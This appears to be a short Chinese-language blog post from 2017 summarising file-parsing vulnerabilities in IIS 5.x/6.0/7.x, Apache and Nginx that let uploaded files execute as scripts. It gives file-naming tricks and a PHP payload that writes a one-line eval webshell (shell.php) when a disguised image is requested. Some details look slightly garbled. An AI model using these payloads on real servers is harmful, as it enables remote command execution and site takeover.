文件解析漏洞

一:IIS 5.X/6.0解析漏洞

1:目录解析
    将一句话木马后缀名改为.jpg放在上传文件目录下,文件无法执行,
    但是可以创建文件夹名为.jsp;然后把一句话木马.jpg文件放在该文件夹下,
    再整体上传该文件夹即可。
2:XX.asp/XX.php
    在IS6.0中,分号后面的不会被解析,也就是说good.asp;.jsp
    当上传文件时允许上传,但是服务器解析时“;”后面的不会被解析,达到上传漏洞的利用

二:Apache解析漏洞

* Apache解析是从右向左析的,如果遇到不可是别的解析就继续往左解析;
* 比如:good.php.owf.rar; “.owf”和“.rar”Apache不能解析,Apache继续往左解析,
  所以Apache会把该文件解析为php文件

三:IIS7.0/IIS7.5/Nginx < 8.03畸形解析漏洞

1;在默认Fast-CGI的情况下,上传一个good.jpg;内容为:<?PHP fputs(fopen('shell.php','w'),'<?php eval(_POST[cmd])?>');?>的文件,然后访问
 good.jpg/.php;在这个目录下就会生成shell.php的一句话木马文件

posted on 2017-04-07 19:31  l0cal  阅读(504)  评论(0编辑  收藏  举报

导航